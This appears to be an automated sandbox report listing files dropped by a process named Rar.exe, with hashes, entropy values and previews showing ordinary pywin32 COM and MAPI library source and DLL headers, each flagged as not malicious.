                                                                                                                                                                                      Preview:"""Utilities for registering objects...This module contains utility functions to register Python objects as.valid COM Servers. The RegisterServer function provides all information.necessary to allow the COM framework to respond to a request for a COM object,.construct the necessary Python object, and dispatch COM events...""".import os.import sys..import pythoncom.import win32api.import win32con.import winerror..CATID_PythonCOMServer = "{B3EF80D0-68E2-11D0-A689-00C04FD658FF}"...def _set_subkeys(keyName, valueDict, base=win32con.HKEY_CLASSES_ROOT):. hkey = win32api.RegCreateKey(base, keyName). try:. for key, value in valueDict.items():. win32api.RegSetValueEx(hkey, key, None, win32con.REG_SZ, value). finally:. win32api.RegCloseKey(hkey)...def _set_string(path, value, base=win32con.HKEY_CLASSES_ROOT):. "Set a string value in the registry.".. win32api.RegSetValue(base, path, win32con.REG_SZ, value)...def _get_string(path, base=win32con.HKEY_CLASSES
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6702
                                                                                                                                                                                      Entropy (8bit):4.682014380050602
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:zbQehv+u6tEWC62LI2nTprmqQZuJqYHN6VNYxA7wd:HB+t46MI2lrmqQZuJqYHGNefd
                                                                                                                                                                                      MD5:15D42CC3F4D36665BC50CEE6B3231E75
                                                                                                                                                                                      SHA1:E5615F3EB48FEBAA76B1E7B7B274C202BD76D324
                                                                                                                                                                                      SHA-256:0D8E925E710539EAFCCA76510034C2A046AA0F35B1CF557E7C5FE40A9BFE72BE
                                                                                                                                                                                      SHA-512:658CE11A42C81C6BEB8B67CA016D590A99E6B858970C6B577BA2E464607CC621A7EA5F8FC9C00EDA0446C89C0D6281B346B3700A71EFD86F5E5C0127AB90BE61
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" General Server side utilities .""".import pythoncom.import winerror..from . import policy.from .exception import COMException...def wrap(ob, iid=None, usePolicy=None, useDispatcher=None):. """Wraps an object in a PyGDispatch gateway... Returns a client side PyI{iid} interface... Interface and gateway support must exist for the specified IID, as. the QueryInterface() method is used... """. if usePolicy is None:. usePolicy = policy.DefaultPolicy. if useDispatcher == 1: # True will also work here.. import win32com.server.dispatcher.. useDispatcher = win32com.server.dispatcher.DefaultDebugDispatcher. if useDispatcher is None or useDispatcher == 0:. ob = usePolicy(ob). else:. ob = useDispatcher(usePolicy, ob).. # get a PyIDispatch, which interfaces to PyGDispatch. ob = pythoncom.WrapObject(ob). if iid is not None:. ob = ob.QueryInterface(iid) # Ask the PyIDispatch if it supports it?. return ob...def unwra
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1178
                                                                                                                                                                                      Entropy (8bit):4.426483796070394
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:kG788TbzrcW/r7FZybFrKwipwBX4C77F3ugx9/HCZLG/h6eTerrNiXZM/2X6H/a+:kG788fzrcWD7FAbFrkOh4qTxi1k6e6Hj
                                                                                                                                                                                      MD5:B06CC9A0DBAB570B5DB41637E1AD6573
                                                                                                                                                                                      SHA1:81FADB18B9198660C1498BE715131A482310C0DB
                                                                                                                                                                                      SHA-256:114DE154A15223D1AAD50FCCFF02493C796BF367F09E18130C8F2DD39BEBCA1B
                                                                                                                                                                                      SHA-512:CB149B96E16445EEE13CAA1618FB4A0A07AB0D79A9DF317CDC0DDB649D593389E1F5682FA973FDAEB415F7277E1527CB23C4051A6D244BB60DC3E376ABF6CFDF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import sys.import time...class Tools:. _public_methods_ = ["reload", "adddir", "echo", "sleep"].. def reload(self, module):. if module in sys.modules:. from importlib import reload.. reload(sys.modules[module]). return "reload succeeded.". return "no reload performed.".. def adddir(self, dir):. if type(dir) == type(""):. sys.path.append(dir). return str(sys.path).. def echo(self, arg):. return repr(arg).. def sleep(self, t):. time.sleep(t)...if __name__ == "__main__":. from win32com.server.register import RegisterServer, UnregisterServer.. clsid = "{06ce7630-1d81-11d0-ae37-c2fa70000000}". progid = "Python.Tools". verprogid = "Python.Tools.1". if "--unregister" in sys.argv:. print("Unregistering..."). UnregisterServer(clsid, progid, verprogid). print("Unregistered OK"). else:. print("Registering COM server..."). RegisterServer(.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4463
                                                                                                                                                                                      Entropy (8bit):4.745656083351947
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Nce3k70ArkQThivNM1/vNMpU81BALecPRvHrl04rOpFCnlN/w:NcG+d4u13u+LRpCFCnlhw
                                                                                                                                                                                      MD5:EB469879CD0B5D622321D44327FF67C7
                                                                                                                                                                                      SHA1:EC40C6F0114B449480B576CDE088235946C70372
                                                                                                                                                                                      SHA-256:F3A6EC518C93D52BEF1AEB589EA369008A8072F959F85341BAF8D4BE2CE45F29
                                                                                                                                                                                      SHA-512:D94BD462CA97223AEE52EF14DBBCD78835D588F5B1959169DE8E013990E408DD4FB0A0A30DE0A13585676D7B726D34B2F9E32157C50F87CFE08D4CE551F0A85D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python.Dictionary COM Server...This module implements a simple COM server that acts much like a Python.dictionary or as a standard string-keyed VB Collection. The keys of.the dictionary are strings and are case-insensitive...It uses a highly customized policy to fine-tune the behavior exposed to.the COM client...The object exposes the following properties:.. int Count (readonly). VARIANT Item(BSTR key) (propget for Item). Item(BSTR key, VARIANT value) (propput for Item).. Note that 'Item' is the default property, so the following forms of. VB code are acceptable:.. set ob = CreateObject("Python.Dictionary"). ob("hello") = "there". ob.Item("hi") = ob("HELLO")..All keys are defined, returning VT_NULL (None) if a value has not been.stored. To delete a key, simply assign VT_NULL to the key...The object responds to the _NewEnum method by returning an enumerator over.the dictionary's keys. This allows for the following
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1664
                                                                                                                                                                                      Entropy (8bit):4.854103740699842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:FMw3KxRNHwFrJKuXHIvL2n2qcqZLBHUvUVjvIC0u9/w:FM4KxR6FrJKoIzQIqZLBfjQC0u9/w
                                                                                                                                                                                      MD5:043481AD1E25C1417AE87C27B647F87D
                                                                                                                                                                                      SHA1:83B216E7DB147EEA48365225668F2B26ABE102AF
                                                                                                                                                                                      SHA-256:865C5BACB0CD3EBE596AAA08F9DD7D7DDE9B203ACD4A1637E8920ED986555395
                                                                                                                                                                                      SHA-512:71B9DC8ADBA9ED91E48D49E5A9A5F30F6C74E666CE280E386F23E0FBC6D2EDCB26194B9E7411409886DE71F6DC8CCB78C65DE48223778062604B4EE2F0AF9652
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python.Interpreter COM Server.. This module implements a very very simple COM server which. exposes the Python interpreter... This is designed more as a demonstration than a full blown COM server.. General functionality and Error handling are both limited... To use this object, ensure it is registered by running this module. from Python.exe. Then, from Visual Basic, use "CreateObject('Python.Interpreter')",. and call its methods!."""..import winerror.from win32com.server.exception import Exception...# Expose the Python interpreter..class Interpreter:. """The interpreter object exposed via COM""".. _public_methods_ = ["Exec", "Eval"]. # All registration stuff to support fully automatic register/unregister. _reg_verprogid_ = "Python.Interpreter.2". _reg_progid_ = "Python.Interpreter". _reg_desc_ = "Python Interpreter". _reg_clsid_ = "{30BD3490-2632-11cf-AD5B-524153480001}". _reg_class_spec_ = "win32com.servers.interp.Interpreter".. def __init__(self)
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1164
                                                                                                                                                                                      Entropy (8bit):4.9132762177228235
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:I39k2E5hMQqvpdIGvzga+2Sk2vcSV4yWQSzCGfGQqklrGUMrDHlIpeXZM/Q/HN:wC2E5hMQqhdIGvg2R2vc0WQlGfGGtGh3
                                                                                                                                                                                      MD5:FC57DB2AB422A0FBBF19FAEE627A7036
                                                                                                                                                                                      SHA1:4AD31007AFDE4FBAED826C514CE860C61D599204
                                                                                                                                                                                      SHA-256:5B3BE0A4E996218ACB5305D94685B8752B17C32F006859876973A3B8AABE7A45
                                                                                                                                                                                      SHA-512:5A011AE1FB0A93A6E0C6CB337878384E9A86165FDCDDC4864F38DE90739E7E5A5BA3E7C684065CD664736CFCA07DC8A607299955F36E99EB28B4808F4CDCB49E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A COM Server which exposes the NT Performance monitor in a very rudimentary way..Usage from VB:..set ob = CreateObject("Python.PerfmonQuery")..freeBytes = ob.Query("Memory", "Available Bytes").""".import pythoncom.import win32pdhutil.import winerror.from win32com.server import exception, register...class PerfMonQuery:. _reg_verprogid_ = "Python.PerfmonQuery.1". _reg_progid_ = "Python.PerfmonQuery". _reg_desc_ = "Python Performance Monitor query object". _reg_clsid_ = "{64cef7a0-8ece-11d1-a65a-00aa00125a98}". _reg_class_spec_ = "win32com.servers.perfmon.PerfMonQuery". _public_methods_ = ["Query"].. def Query(self, object, counter, instance=None, machine=None):. try:. return win32pdhutil.GetPerformanceAttributes(. object, counter, instance, machine=machine. ). except win32pdhutil.error as exc:. raise exception.Exception(desc=exc.strerror). except TypeError as desc:. raise exception.Exc
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5105
                                                                                                                                                                                      Entropy (8bit):4.973183641509729
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:P3TP/djb7S6awwJdPeo1YaJ0BJ4Lk1bfvM6:fTP/17jawwfPEaJ6J4LkdfvM6
                                                                                                                                                                                      MD5:8F95097AEDD504D036DADE45C6379215
                                                                                                                                                                                      SHA1:A74546A08C65A5D86819ECD7125E54C8AD76EF5F
                                                                                                                                                                                      SHA-256:9DF8CD7887DE8A6676B164603FF136FA455B31CA893CBF9FC05C44604F98D73E
                                                                                                                                                                                      SHA-512:78876D96E9773EED3EBEEB7E448C7A9E9D2915F440644FC08B1060FB3EA99087F3FFB7C4BB0040DE692BD2FE6A2F6592CEB9750F3CAE68EB60A996415FD1492E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is part of the Python test suite..# The object is registered when you first run the test suite..# (and hopefully unregistered once done ;-)..import pythoncom.import winerror..# Ensure the vtables in the tlb are known..from win32com import universal.from win32com.client import constants, gencache.from win32com.server.exception import COMException.from win32com.server.util import wrap..pythoncom.__future_currency__ = True.# We use the constants from the module, so must insist on a gencache..# Otherwise, use of gencache is not necessary (tho still advised).gencache.EnsureModule("{6BCDCB60-5605-11D0-AE5F-CADD4C000000}", 0, 1, 1)...class PyCOMTest:. _typelib_guid_ = "{6BCDCB60-5605-11D0-AE5F-CADD4C000000}". _typelib_version = 1, 0. _com_interfaces_ = ["IPyCOMTest"]. _reg_clsid_ = "{e743d9cd-cb03-4b04-b516-11d3a81c1597}". _reg_progid_ = "Python.Test.PyCOMTest".. def DoubleString(self, str):. return str * 2.. def DoubleInOutString(self, str):. return
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3029
                                                                                                                                                                                      Entropy (8bit):5.133408473790648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:mD5ZPfsTv+F3VJkSJ65MzlZCwDSfWtZItv+34hnraZDcu/LbFDwe5ZJoReRS4w:msT+Ff/GwDSf4ItM4rIDfzqimR+Pw
                                                                                                                                                                                      MD5:F5C9F7C9D0DFD4D534CB514CBF4C88FB
                                                                                                                                                                                      SHA1:BC4B8F8981DE8AEF0E78DB36B175838A0DF62729
                                                                                                                                                                                      SHA-256:4EDC19EE04C728CE1090DA8B99C064D64402C5840D14B7FF7105F31D5CA4070D
                                                                                                                                                                                      SHA-512:9AA3C5889AF5AB08EAFDE439A02478CBD620F959148A3AA4AFEE327C47683FB403451A4ADE312B5745A931ABEAF17563095000241433C8B256F63D70AE410312
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Constants related to IStorage and related interfaces..This file was generated by h2py from d:\msdev\include\objbase.h.then hand edited, a few extra constants added, etc.."""..STGC_DEFAULT = 0.STGC_OVERWRITE = 1.STGC_ONLYIFCURRENT = 2.STGC_DANGEROUSLYCOMMITMERELYTODISKCACHE = 4.STGC_CONSOLIDATE = 8..STGTY_STORAGE = 1.STGTY_STREAM = 2.STGTY_LOCKBYTES = 3.STGTY_PROPERTY = 4.STREAM_SEEK_SET = 0.STREAM_SEEK_CUR = 1.STREAM_SEEK_END = 2..LOCK_WRITE = 1.LOCK_EXCLUSIVE = 2.LOCK_ONLYONCE = 4..# Generated as from here...CWCSTORAGENAME = 32.STGM_DIRECT = 0x00000000.STGM_TRANSACTED = 0x00010000.STGM_SIMPLE = 0x08000000.STGM_READ = 0x00000000.STGM_WRITE = 0x00000001.STGM_READWRITE = 0x00000002.STGM_SHARE_DENY_NONE = 0x00000040.STGM_SHARE_DENY_READ = 0x00000030.STGM_SHARE_DENY_WRITE = 0x00000020.STGM_SHARE_EXCLUSIVE = 0x00000010.STGM_PRIORITY = 0x00040000.STGM_DELETEONRELEASE = 0x04000000.STGM_NOSCRATCH = 0x00100000.STGM_CREATE = 0x00001000.STGM_CONVERT = 0x00020000.STGM_FAILIFTHERE = 0x00000000.S
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):598
                                                                                                                                                                                      Entropy (8bit):4.452174489930338
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:h6L9yKlip4fwRw2oliOzd/zEMzNmRw2oliS4LZwRwqxRLHpCvqRKzAS6v:sJlY4EwFzlzEeNWwFx4LiwrrUJv
                                                                                                                                                                                      MD5:9DC0B96E4086115BFA0124F10DE8DF27
                                                                                                                                                                                      SHA1:12D70C7C9CE86D0DD497CD4B18982EC2A3A1F8F8
                                                                                                                                                                                      SHA-256:2DB6C9A3EFC87F2A774F1D63D09EF649DCA0F764F5317C76B145595E8608699A
                                                                                                                                                                                      SHA-512:9369BE70DBD6DBA5A108AFBE83686F42BB65EF2526D7C9015BA2D97A86CCAEC6CF40E4A8F9BF5BDC61ECDFCA10032508A57335CC540087857D613650F343A858
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:if type(__path__) == type(""):. # For freeze to work!. import sys.. try:. import mapi.. sys.modules["win32com.mapi.mapi"] = mapi. except ImportError:. pass. try:. import exchange.. sys.modules["win32com.mapi.exchange"] = exchange. except ImportError:. pass. try:. import exchdapi.. sys.modules["win32com.mapi.exchdapi"] = exchdapi. except ImportError:. pass.else:. import win32com.. # See if we have a special directory for the binaries (for developers). win32com.__PackageSupportBuildPath__(__path__).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3558
                                                                                                                                                                                      Entropy (8bit):4.925300298608504
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:XxnSR8qvUhcfj2YvwxlQemLmm58mNyYGrj+:XxSDfjnvwxuDLKri
                                                                                                                                                                                      MD5:2330E0C56C096DD1817F4DD7F640D053
                                                                                                                                                                                      SHA1:6C79E8F892F50AEB538833DB612BB94CDF76CB70
                                                                                                                                                                                      SHA-256:1CD1A8B5147BE673262F63E784C23FD2611887D9EEEC3AB49AF260931489B3C2
                                                                                                                                                                                      SHA-512:33EA73AC64FABCF3938B38C3BF502C8DFC4C444BA2D784BD52E277B28A0F9E80DF978A2B54659F39932E9D43DEBB9D5DEE35183B8ED5C4274E6D656648913E9D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#!/usr/bin/env python.."""module to send mail with Extended MAPI using the pywin32 mapi wrappers..."""..# this was based on Jason Hattingh's C++ code at http://www.codeproject.com/internet/mapadmin.asp.# written by David Fraser <davidf at sjsoft.com> and Stephen Emslie <stephene at sjsoft.com>.# you can test this by changing the variables at the bottom and running from the command line..from win32com.mapi import mapi, mapitags...def SendEMAPIMail(. Subject="", Message="", SendTo=None, SendCC=None, SendBCC=None, MAPIProfile=None.):. """Sends an email to the recipient using the extended MAPI interface. Subject and Message are strings. Send{To,CC,BCC} are comma-separated address lists. MAPIProfile is the name of the MAPI profile""".. # initialize and log on. mapi.MAPIInitialize(None). session = mapi.MAPILogonEx(. 0, MAPIProfile, None, mapi.MAPI_EXTENDED | mapi.MAPI_USE_DEFAULT. ). messagestorestable = session.GetMsgStoresTable(0). messagestorestable
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):49320
                                                                                                                                                                                      Entropy (8bit):4.713409859343289
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:LEeEtNDu70C67HySIPPrn/ft7rQI+sUQqF5v:LEeEtN+0C67HySIPD/ft7rQI+sUXF5v
                                                                                                                                                                                      MD5:EA8F034EB98534C75F272B8439069E23
                                                                                                                                                                                      SHA1:91911B94EE35A6393FD89150B5990722193A20B7
                                                                                                                                                                                      SHA-256:9CD4D0847A677387AD43A9E27C45AFFE8DCE2B03F3DB5585B191E3D0E2446FBD
                                                                                                                                                                                      SHA-512:D152007752EEEB1C6BF61F52A7B53763EFB1311B31614CC75DD6DDB8B3A1B1B42B366B29A527FA7FF12C7AA8F588B2D761A64245D11D6471D7BAA7E4BC1BE1ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Converted "manually" from EMSABTAG.H.from .mapitags import (. PROP_TAG,. PT_APPTIME,. PT_BINARY,. PT_BOOLEAN,. PT_CLSID,. PT_CURRENCY,. PT_DOUBLE,. PT_ERROR,. PT_FLOAT,. PT_I2,. PT_I4,. PT_I8,. PT_LONG,. PT_LONGLONG,. PT_MV_APPTIME,. PT_MV_BINARY,. PT_MV_CLSID,. PT_MV_CURRENCY,. PT_MV_DOUBLE,. PT_MV_FLOAT,. PT_MV_I2,. PT_MV_I4,. PT_MV_I8,. PT_MV_LONG,. PT_MV_LONGLONG,. PT_MV_R4,. PT_MV_R8,. PT_MV_SHORT,. PT_MV_STRING8,. PT_MV_SYSTIME,. PT_MV_TSTRING,. PT_MV_UNICODE,. PT_NULL,. PT_OBJECT,. PT_R4,. PT_SHORT,. PT_STRING8,. PT_SYSTIME,. PT_TSTRING,. PT_UNICODE,. PT_UNSPECIFIED,.)..AB_SHOW_PHANTOMS = 2.AB_SHOW_OTHERS = 4..# Flags for ulFlag on ResolveNames.EMS_AB_ADDRESS_LOOKUP = 1...# Constructed, but externally visible..PR_EMS_AB_SERVER = PROP_TAG(PT_TSTRING, 65534).PR_EMS_AB_SERVER_A = PROP_TAG(PT_STRING8, 65534).PR_EMS_AB_SERVER_W = PROP_TAG(PT_UNICODE, 65534).PR_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):162304
                                                                                                                                                                                      Entropy (8bit):6.596400165237489
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:NiUZOyQPazr+cFBwEsQkNuG/vYkZ4JIJUUienvbDy+:NiU7SQwRvRZ4KJUUNvb
                                                                                                                                                                                      MD5:9387B5DBD459972655D7B59EE03AE708
                                                                                                                                                                                      SHA1:5D73A2D0F3AD53F63C31173F6B32DD38E8CA9B28
                                                                                                                                                                                      SHA-256:724A46CF68AE5EBEDD842CCC523FF4E41985A543326D62BB82A5983530362762
                                                                                                                                                                                      SHA-512:4FCA0E27E90E8BC73BAAFA9A9EFD50231B8B8AD41797A54B5DB7363F44874D8A0B732B7FB6B87193BC4B12E5CDDA8AF37F92FF09E13D4E2A21E790A1D0AD3AFF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}9V..W...W...W..d....W..iV...W..iR...W..iS...W..iT...W.TiV...W..wS...W.2uV...W..wV...W...V.2.W.Ti^...W.TiW...W.TiU...W.Rich..W.................PE..L......d...........!................w}....................................................@.........................P+..H....+..........L.......................P8......T...........................@...@............................................text...+........................... ..`.rdata..B...........................@..@.data....%...P......................@....rsrc...L............<..............@..@.reloc..P8.......:...@..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):51436
                                                                                                                                                                                      Entropy (8bit):4.950931920129641
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:/NSkrYNyFN+Hw+TtyYCay1V1b2a/HpNp/:XrYNyFN+Hw+hyYCayzHpNp/
                                                                                                                                                                                      MD5:2CF7198F848CE136CD67A81D89FD1C2F
                                                                                                                                                                                      SHA1:82F94791179550740AC42EF06F3483C212AABE38
                                                                                                                                                                                      SHA-256:4AABD2B46EDDE811134333BF637088E6110C6B2849FFF1C0301DA365DDACF5BB
                                                                                                                                                                                      SHA-512:CFC2958555B19D76C34DD251088C813E49EA6A9DD310490106819353EB7A3479319FD50092BA55A2A41AAAC7AF71A1AAA56CBC5274A8FE4EA74932884B3537AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MV_FLAG = 4096 # Multi-value flag..PT_UNSPECIFIED = 0.PT_NULL = 1.PT_I2 = 2.PT_LONG = 3.PT_R4 = 4.PT_DOUBLE = 5.PT_CURRENCY = 6.PT_APPTIME = 7.PT_ERROR = 10.PT_BOOLEAN = 11.PT_OBJECT = 13.PT_I8 = 20.PT_STRING8 = 30.PT_UNICODE = 31.PT_SYSTIME = 64.PT_CLSID = 72.PT_BINARY = 258..PT_SHORT = PT_I2.PT_I4 = PT_LONG.PT_FLOAT = PT_R4.PT_R8 = PT_DOUBLE.PT_LONGLONG = PT_I8..PT_MV_I2 = MV_FLAG | PT_I2.PT_MV_LONG = MV_FLAG | PT_LONG.PT_MV_R4 = MV_FLAG | PT_R4.PT_MV_DOUBLE = MV_FLAG | PT_DOUBLE.PT_MV_CURRENCY = MV_FLAG | PT_CURRENCY.PT_MV_APPTIME = MV_FLAG | PT_APPTIME.PT_MV_SYSTIME = MV_FLAG | PT_SYSTIME.PT_MV_STRING8 = MV_FLAG | PT_STRING8.PT_MV_BINARY = MV_FLAG | PT_BINARY.PT_MV_UNICODE = MV_FLAG | PT_UNICODE.PT_MV_CLSID = MV_FLAG | PT_CLSID.PT_MV_I8 = MV_FLAG | PT_I8..PT_MV_SHORT = PT_MV_I2.PT_MV_I4 = PT_MV_LONG.PT_MV_FLOAT = PT_MV_R4.PT_MV_R8 = PT_MV_DOUBLE.PT_MV_LONGLONG = PT_MV_I8..PT_TSTRING = PT_UNICODE # ???.PT_MV_TSTRING = MV_FLAG | PT_UNICODE...PROP_TYPE_MASK = 65535 # Mask for Prope
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7276
                                                                                                                                                                                      Entropy (8bit):4.593130231727299
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:bY5s4PHIsQgecTdZuFlevL8BCvjuo4VVKPRZ27hA66bXQPSNuG1oGMYceMIH71LS:cFRecTPyevhvKT2RMyiwjE+4
                                                                                                                                                                                      MD5:075C7F5E9CB9FC6385C866FC924A4C22
                                                                                                                                                                                      SHA1:CA536F458253EFF4BCAF1BC859922182051B1BA7
                                                                                                                                                                                      SHA-256:357D64E7D2347960A41CC1ABC625A7559B537AE78EDFAD74B9C767CF66B88928
                                                                                                                                                                                      SHA-512:020AD4CBC119ADD7AB61BFEF1BE14162967FD2B1047AA0221BCE900E945612C42D1B44B8291C7E6E36A04398D35E3ABC559C76B9D91A864A41316374C5517DFA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# General utilities for MAPI and MAPI objects..# We used to use these old names from the 'types' module....TupleType = tuple.ListType = list.IntType = int.import pythoncom.from pywintypes import TimeType..from . import mapi, mapitags..prTable = {}...def GetPropTagName(pt):. if not prTable:. for name, value in mapitags.__dict__.items():. if name[:3] == "PR_":. # Store both the full ID (including type) and just the ID.. # This is so PR_FOO_A and PR_FOO_W are still differentiated,. # but should we get a PT_FOO with PT_ERROR set, we fallback. # to the ID... # String types should have 3 definitions in mapitags.py. # PR_BODY.= PROP_TAG( PT_TSTRING,.4096). # PR_BODY_W.= PROP_TAG( PT_UNICODE, 4096). # PR_BODY_A.= PROP_TAG( PT_STRING8, 4096). # The following change ensures a lookup using only the the. # property id returns the
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27
                                                                                                                                                                                      Entropy (8bit):3.7784235030301256
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SnEbW2:SEbH
                                                                                                                                                                                      MD5:45224049EC07B287039847222E800760
                                                                                                                                                                                      SHA1:EC8739A7A29F6642BF5BC6DBA2D4036A0180D440
                                                                                                                                                                                      SHA-256:CC02539C2EAA6067E144A7C9391F3E5B2AE9ECDB293A769EA18D851E71B8A436
                                                                                                                                                                                      SHA-512:98945673C71CBA233CC3983D53813483626E5B1BE4EC5E297092F76FE2677BEC3E04A1950BA7BFD8C1C9658AD8456E19CC069A3C86F67BB02BCB2A36DB1CE558
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# this is a python package.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):115712
                                                                                                                                                                                      Entropy (8bit):6.8690282004403365
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:2sS7bWVZ7JZp8WHDCjXYD2QgqHEkVfNZ6:DSeVZ7JZSkCjXYDJgqkkV
                                                                                                                                                                                      MD5:6DFB5F1EB67364BB5610B222C6B710E8
                                                                                                                                                                                      SHA1:96D751A687B74BCE8BE5277A3228D8B3EC72B854
                                                                                                                                                                                      SHA-256:ABE5965D7662635090B4FA7A5C814B3E68A77659721261102D944C3AB5517A27
                                                                                                                                                                                      SHA-512:FAE014A53CAD028934CC9172DD8642E00CF2A18B60F552578FD1FE03344F71F266D8693DF704347E3D8D68E0BF0ADB46B1A80CE633022BCB7F66FB03D6A290E3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
